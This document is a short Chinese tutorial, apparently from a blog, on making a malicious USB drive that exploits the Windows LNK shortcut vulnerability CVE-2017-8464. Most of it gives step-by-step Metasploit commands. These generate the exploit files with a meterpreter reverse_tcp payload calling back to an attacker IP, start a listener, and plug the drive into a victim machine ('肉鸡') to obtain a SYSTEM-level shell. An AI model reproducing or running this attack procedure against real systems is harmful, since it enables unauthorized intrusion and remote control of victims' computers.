利用CVE-2017-8464漏洞制作病毒U盘攻击

利用CVE-2017-8464漏洞制作病毒U盘

漏洞简介

在“震网行动”中攻击者利用LNK快捷方式漏洞成功入侵了工控系统,并进一步利用漏洞做摆渡攻击,入侵核心工控系统,LNK漏洞危害级别为高危,用户只要是浏览或查看了存 在病毒的LNK文件,不需要用户点击,就会执行入侵者构造好的恶意代码。

病毒U盘制作

使用kali中msfconsole攻击模块生成病毒U盘文件。

1、启动msfconsole

利用CVE-2017-8464漏洞制作病毒U盘攻击_第1张图片

2、搜索漏洞攻击模块

search CVE-2017-8464

利用CVE-2017-8464漏洞制作病毒U盘攻击_第2张图片

3、使用LNK漏洞攻击模块(复制编号0的攻击模块)

use exploit/windows/fileformat/cve_2017_8464_lnk_rce

show options

利用CVE-2017-8464漏洞制作病毒U盘攻击_第3张图片

4、设置payload

set payload windows/meterpreter/reverse_tcp

5、设置LHOST(攻击机IP地址)

set lhost 192.168.1.213 (改为自己攻击机器IP)

利用CVE-2017-8464漏洞制作病毒U盘攻击_第4张图片

6、运行攻击模块

exploit

利用CVE-2017-8464漏洞制作病毒U盘攻击_第5张图片

7、在/root/.msf4/local/目录下生成了对应的病毒文件

8、将上一步生成的所有文件复制到U盘中,如上图所示文件

9、在kali中开启监听

use exploit/multi/handler

10、设置payload

set payload windows/meterpreter/reverse_tcp

利用CVE-2017-8464漏洞制作病毒U盘攻击_第6张图片

11、配置lhost

set lhost 192.168.1.213 (改为自己攻击机的IP)

利用CVE-2017-8464漏洞制作病毒U盘攻击_第7张图片

12、启动监听模块

exploit

13、将U盘插入肉鸡中,kali成功创建了session

利用CVE-2017-8464漏洞制作病毒U盘攻击_第8张图片

14、成功拿到system权限shell

利用CVE-2017-8464漏洞制作病毒U盘攻击_第9张图片

漏洞说明:

利用kali生成的病毒文件会直接反弹一个shell,我们也可以自己编写cpl恶意代码文件来实现攻击效果,具体实现看上一篇文章

CVE-2017-8464漏洞原理分析

LNK文件生成器:Github

 

你可能感兴趣的:(利用CVE-2017-8464漏洞制作病毒U盘攻击)